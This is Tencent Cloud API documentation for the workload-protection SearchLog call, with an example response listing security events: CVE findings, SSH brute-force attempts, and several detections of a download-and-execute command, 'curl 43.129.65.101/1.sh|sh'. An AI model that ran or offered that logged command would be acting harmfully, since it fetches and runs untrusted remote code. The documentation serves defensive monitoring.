tencent cloud

Feedback

SearchLog

Last updated: 2024-12-06 15:40:03

1. API Description

Domain name for API request: cwp.intl.tencentcloudapi.com.

This API is used to query logs.

A maximum of 20 requests can be initiated per second for this API.

We recommend you to use API Explorer
Try it
API Explorer provides a range of capabilities, including online call, signature authentication, SDK code generation, and API quick search. It enables you to view the request, response, and auto-generated examples.

2. Input Parameters

The following request parameter list only provides API request parameters and some common parameters. For the complete common parameter list, see Common Request Parameters.

Parameter Name Required Type Description
Action Yes String Common Params. The value used for this API: SearchLog.
Version Yes String Common Params. The value used for this API: 2018-02-28.
Region No String Common Params. This parameter is not required.
StartTime Yes Integer Start time for logs to be searched and analyzed, which is a Unix timestamp in milliseconds
EndTime Yes Integer End time for logs to be searched and analyzed, which is a Unix timestamp in milliseconds
QueryString Yes String Statement for search and analysis, with a maximum length of 12 KB
Count No Integer Number of raw logs returned for a single query. Maximum value: 1000. The Context parameter can be used to obtain subsequent logs.
Sort No String Order for returning the raw logs. Valid values: asc (ascending), desc (descending). Default value: desc.
Context No String Pass the Context value returned by the last API call to retrieve more subsequent logs. A total of up to 10,000 raw logs can be obtained, with a validity period of 1 hour.

3. Output Parameters

Parameter Name Type Description
Count Integer Number of raw logs matching the retrieval criteria
Context String Pass through the Context value returned by this API, which can access more logs later, with an expiration time of 1 hour.
ListOver Boolean Whether all logs meeting the retrieval criteria have been returned. If not, use the Context parameter to retrieve more logs.
Analysis Boolean Whether the returned data is the SQL analysis result
Data Array of LogInfo Raw logs matching the retrieval criteria
RequestId String The unique request ID, generated by the server, will be returned for every request (if the request fails to reach the server for other reasons, the request will not obtain a RequestId). RequestId is required for locating a problem.

4. Example

Example1 Example

Input Example

POST / HTTP/1.1
Host: cwp.intl.tencentcloudapi.com
Content-Type: application/json
X-TC-Action: SearchLog
<Common request parameters>

{
    "Sort": "desc",
    "Count": "20",
    "QueryString": "",
    "StartTime": "1656641065449",
    "EndTime": "1656641965449"
}

Output Example

{
    "Response": {
        "Analysis": false,
        "Context": "",
        "Count": 17,
        "Data": [
            {
                "Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"Medium-risk\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://www.phpmyadmin.net/security/PMASA-2016-20/\",\"path\":\"/var/www/html/phpmyadmin\",\"fix\":\"1. It is recommended to upgrade to the latest official version, and the official website address is: https://www.phpmyadmin.net\",\"cve_id\":\"CVE-2016-5704\",\"cls_event_type\":\"Web-CMS_vul\",\"appid\":\"1256299843\",\"name\":\"phpMyAdmin 4.6.x XSS vulnerability on form structure page.\",\"id\":\"771\",\"vul_category\":\"Web-CMS vulnerability\",\"descript\":\"Vulnerability file path: /var/www/html/phpmyadmin/templates/table/structure/display_table_stats.phtml\",\"event_status\":\"modify\",\"status\":\"Pending\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641946000
            },
            {
                "Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"High-risk\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://httpd.apache.org/security/vulnerabilities_24.html\",\"path\":\"\",\"fix\":\"Upgrade to version 2.4.6-90 and above or 2.4.39 and above\",\"cve_id\":\"CVE-2019-0217\",\"cls_event_type\":\"application_vul\",\"appid\":\"1256299843\",\"name\":\"Apache HTTP Server mod_auth_digest race condition vulnerability\",\"id\":\"767\",\"vul_category\":\"Application vulnerability\",\"descript\":\"Apache HTTP Server has the mod_auth_digest module enabled, and the Apache HTTP Server version is: 2.4.37-47.module_el8.6.0+1111+ce6f4ceb.1. \",\"event_status\":\"modify\",\"status\":\"Pending\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641946000
            },
            {
                "Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"Medium-risk\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"True\",\"reference\":\"https://www.phpmyadmin.net/security/PMASA-2016-19/\",\"path\":\"/var/www/html/phpmyadmin\",\"fix\":\"1. It is recommended to upgrade to the latest official version, and the official website address is: https://www.phpmyadmin.net\",\"cve_id\":\"CVE-2016-5703\",\"cls_event_type\":\"emergency_vul\",\"appid\":\"1256299843\",\"name\":\"phpMyAdmin central_columns.lib.php  SQL injection vulnerability\",\"id\":\"772\",\"vul_category\":\"Web-CMS vulnerability\",\"descript\":\"Vulnerability file path: /var/www/html/phpmyadmin/libraries/central_columns.lib.php\",\"event_status\":\"modify\",\"status\":\"Pending\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641946000
            },
            {
                "Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"High-risk\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://www.seebug.org/vuldb/ssvid-92512\",\"path\":\"/var/www/html/phpmyadmin\",\"fix\":\"1. Upgrade to the latest official version, and the official website address is: https://www.phpmyadmin.net\",\"cve_id\":\"CVE-2016-6633\",\"cls_event_type\":\"Web-CMS_vul\",\"appid\":\"1256299843\",\"name\":\"phpMyAdmin dbase extension remote code execution vulnerability\",\"id\":\"764\",\"vul_category\":\"Web-CMS vulnerability\",\"descript\":\"Vulnerability file path: /var/www/html/phpmyadmin/libraries/zip_extension.lib.php\",\"event_status\":\"modify\",\"status\":\"Pending\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641946000
            },
            {
                "Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"Medium-risk\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2020-9490\",\"path\":\"\",\"fix\":\"Upgrade Apache HTTP Server to version 2.4.46\",\"cve_id\":\"CVE-2020-9490\",\"cls_event_type\":\"application_vul\",\"appid\":\"1256299843\",\"name\":\"Apache HTTP Server http2_module denial-of-service vulnerability\",\"id\":\"769\",\"vul_category\":\"Application vulnerability\",\"descript\":\"Apache HTTP Server has the mod_http2 module enabled, and the Apache HTTP Server version is: 2.4.37-47.module_el8.6.0+1111+ce6f4ceb.1. \",\"event_status\":\"modify\",\"status\":\"Pending\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641946000
            },
            {
                "Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"High-risk\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"True\",\"reference\":\"https://www.seebug.org/vuldb/ssvid-92209\",\"path\":\"/var/www/html/phpmyadmin\",\"fix\":\"1. It is recommended to upgrade to the latest official version and avoid using weak passwords.\",\"cve_id\":\"CVE-2016-5734\",\"cls_event_type\":\"emergency_vul\",\"appid\":\"1256299843\",\"name\":\"phpMyAdmin authorized user remote command execution vulnerability\",\"id\":\"768\",\"vul_category\":\"Web-CMS vulnerability\",\"descript\":\"Vulnerability file path: /var/www/html/phpmyadmin/libraries/controllers/table/TableSearchController.php\",\"event_status\":\"modify\",\"status\":\"Pending\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641946000
            },
            {
                "Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"High-risk\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://www.phpmyadmin.net/security/PMASA-2016-40/\",\"path\":\"/var/www/html/phpmyadmin\",\"fix\":\"1. It is recommended to upgrade to the latest official version, and the official website address is: https://www.phpmyadmin.net\",\"cve_id\":\"CVE-2016-6617\",\"cls_event_type\":\"Web-CMS_vul\",\"appid\":\"1256299843\",\"name\":\"phpMyAdmin 4.6.x SQL injection vulnerability of export feature\",\"id\":\"765\",\"vul_category\":\"Web-CMS vulnerability\",\"descript\":\"Vulnerability file path: /var/www/html/phpmyadmin/libraries/display_export.lib.php\",\"event_status\":\"modify\",\"status\":\"Pending\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641946000
            },
            {
                "Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"High-risk\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://www.phpmyadmin.net/security/PMASA-2016-25/\",\"path\":\"/var/www/html/phpmyadmin\",\"fix\":\"1. It is recommended to upgrade to the latest official version, and the official website address is: https://www.phpmyadmin.net\",\"cve_id\":\"CVE-2016-5732\",\"cls_event_type\":\"Web-CMS_vul\",\"appid\":\"1256299843\",\"name\":\"phpMyAdmin 4.6.x XSS vulnerability\",\"id\":\"770\",\"vul_category\":\"Web-CMS vulnerability\",\"descript\":\"Vulnerability file path: /var/www/html/phpmyadmin/templates/table/structure/display_partitions.phtml\",\"event_status\":\"modify\",\"status\":\"Pending\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641946000
            },
            {
                "Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"Medium-risk\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11984\",\"path\":\"\",\"fix\":\"Upgrade to version 2.4.44 and later.\",\"cve_id\":\"CVE-2020-11984\",\"cls_event_type\":\"application_vul\",\"appid\":\"1256299843\",\"name\":\"Apache HTTP Server mod_proxy_uwsgi buffer overflow vulnerability\",\"id\":\"766\",\"vul_category\":\"Application vulnerability\",\"descript\":\"Apache HTTP Server has the mod_proxy_uwsgi module enabled, and the version is: 2.4.37-47.module_el8.6.0+1111+ce6f4ceb.1.\",\"event_status\":\"modify\",\"status\":\"Pending\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641946000
            },
            {
                "Content": "{\"create_time\":\"2022-06-30 11:01:55 +0800 CST\",\"hostip\":\"172.16.48.133\",\"modify_time\":\"2022-07-01 10:15:23 +0800 CST\",\"count\":\"3380\",\"uuid\":\"e1f081aa-7777-4fdf-a2f7-88f3faa3d302\",\"src_ip\":\"82.157.124.14\",\"src_machine_name\":\"ssh\",\"event_type\":\"Brute force cracking failed\",\"appid\":\"1256299843\",\"cls_event_type\":\"bruteattack\",\"dst_port\":\"22\",\"location\":\"Beijing-Beijing city\",\"banned\":\"Unblocked (non-Pro Edition; non-Ultimate Edition)\",\"id\":\"202226000001705\",\"event_status\":\"modify\",\"status\":\"Pending\",\"username\":\"root\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641844000
            },
            {
                "Content": "{\"create_time\":\"2022-06-30 11:01:55 +0800 CST\",\"hostip\":\"172.16.48.133\",\"modify_time\":\"2022-07-01 10:15:23 +0800 CST\",\"count\":\"3380\",\"uuid\":\"e1f081aa-7777-4fdf-a2f7-88f3faa3d302\",\"src_ip\":\"82.157.124.14\",\"src_machine_name\":\"ssh\",\"event_type\":\"Brute force cracking failed\",\"appid\":\"1256299843\",\"cls_event_type\":\"bruteattack\",\"dst_port\":\"22\",\"location\":\"Beijing-Beijing city\",\"banned\":\"Unblocked (non-Pro Edition; non-Ultimate Edition)\",\"id\":\"202226000001705\",\"event_status\":\"modify\",\"status\":\"Pending\",\"username\":\"root\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641824000
            },
            {
                "Content": "{\"create_time\":\"2022-07-01 10:10:03 +0800 CST\",\"hostip\":\"172.16.0.49\",\"rule_name\":\"1003.Malicious commands - download & execute unknown programs\",\"modify_time\":\"0001-01-01 00:00:00 +0000 UTC\",\"rule_level\":\"High-risk\",\"uuid\":\"7168bc08-c1b8-11ea-9053-48fd8e5f474c\",\"platform\":\"Linux64\",\"appid\":\"1256299843\",\"cls_event_type\":\"bash\",\"exec_time\":\"2022-07-01 10:10:01 +0800 CST\",\"id\":\"3141559\",\"bash_cmd\":\"/bin/sh -c curl 43.129.65.101/1.sh|sh\",\"user\":\"0:0\",\"event_status\":\"create\",\"status\":\"Pending\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641520000
            },
            {
                "Content": "{\"create_time\":\"2022-07-01 07:44:58 +0800 CST\",\"hostip\":\"172.16.48.79\",\"modify_time\":\"2022-07-01 10:09:23 +0800 CST\",\"count\":\"349\",\"uuid\":\"93137e79-ae2e-4677-95ac-23a5024607b1\",\"src_ip\":\"110.40.168.164\",\"src_machine_name\":\"ssh\",\"event_type\":\"\"Brute force cracking failed\",\"appid\":\"1256299843\",\"cls_event_type\":\"bruteattack\",\"dst_port\":\"22\",\"location\":\"Shanghai-Shanghai city\",\"banned\":\"Unblocked (non-Pro Edition; non-Ultimate Edition)\",\"id\":\"202226000001999\",\"event_status\":\"modify\",\"status\":\"Pending\",\"username\":\"root\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641484000
            },
            {
                "Content": "{\"create_time\":\"2022-07-01 07:44:58 +0800 CST\",\"hostip\":\"172.16.48.79\",\"modify_time\":\"2022-07-01 10:09:23 +0800 CST\",\"count\":\"349\",\"uuid\":\"93137e79-ae2e-4677-95ac-23a5024607b1\",\"src_ip\":\"110.40.168.164\",\"src_machine_name\":\"ssh\",\"event_type\":\"\"Brute force cracking failed\",\"appid\":\"1256299843\",\"cls_event_type\":\"bruteattack\",\"dst_port\":\"22\",\"location\":\"Shanghai-Shanghai city\",\"banned\":\"Unblocked (non-Pro Edition; non-Ultimate Edition)\",\"id\":\"202226000001999\",\"event_status\":\"modify\",\"status\":\"Pending\",\"username\":\"root\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641464000
            },
            {
                "Content": "{\"create_time\":\"2022-07-01 10:07:04 +0800 CST\",\"hostip\":\"172.16.0.49\",\"rule_name\":\"1003.Malicious commands - download & execute unknown programs\",\"modify_time\":\"0001-01-01 00:00:00 +0000 UTC\",\"rule_level\":\"High-risk\",\"uuid\":\"7168bc08-c1b8-11ea-9053-48fd8e5f474c\",\"platform\":\"Linux64\",\"appid\":\"1256299843\",\"cls_event_type\":\"bash\",\"exec_time\":\"2022-07-01 10:07:01 +0800 CST\",\"id\":\"3141558\",\"bash_cmd\":\"/bin/sh -c curl 43.129.65.101/1.sh|sh\",\"user\":\"0:0\",\"event_status\":\"create\",\"status\":\"Pending\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641280000
            },
            {
                "Content": "{\"create_time\":\"2022-07-01 10:05:04 +0800 CST\",\"hostip\":\"172.16.0.49\",\"rule_name\":\"1003.Malicious commands - download & execute unknown programs\",\"modify_time\":\"0001-01-01 00:00:00 +0000 UTC\",\"rule_level\":\"High-risk\",\"uuid\":\"7168bc08-c1b8-11ea-9053-48fd8e5f474c\",\"platform\":\"Linux64\",\"appid\":\"1256299843\",\"cls_event_type\":\"bash\",\"exec_time\":\"2022-07-01 10:05:01 +0800 CST\",\"id\":\"3141557\",\"bash_cmd\":\"/bin/sh -c curl 43.129.65.101/1.sh|sh\",\"user\":\"0:0\",\"event_status\":\"create\",\"status\":\"Pending\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641160000
            },
            {
                "Content": "{\"create_time\":\"2022-07-01 10:04:05 +0800 CST\",\"hostip\":\"172.16.0.49\",\"rule_name\":\"1003.Malicious commands - download & execute unknown programs\",\"modify_time\":\"0001-01-01 00:00:00 +0000 UTC\",\"rule_level\":\"High-risk\",\"uuid\":\"7168bc08-c1b8-11ea-9053-48fd8e5f474c\",\"platform\":\"Linux64\",\"appid\":\"1256299843\",\"cls_event_type\":\"bash\",\"exec_time\":\"2022-07-01 10:04:01 +0800 CST\",\"id\":\"3141556\",\"bash_cmd\":\"/bin/sh -c curl 43.129.65.101/1.sh|sh\",\"user\":\"0:0\",\"event_status\":\"create\",\"status\":\"Pending\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641160000
            }
        ],
        "ListOver": true,
        "RequestId": "e6bb2f6d-10b3-40fd-b3a4-630dbdf477c3"
    }
}

5. Developer Resources

SDK

TencentCloud API 3.0 integrates SDKs that support various programming languages to make it easier for you to call APIs.

Command Line Interface

6. Error Code

There is no error code related to the API business logic. For other error codes, please see Common Error Codes.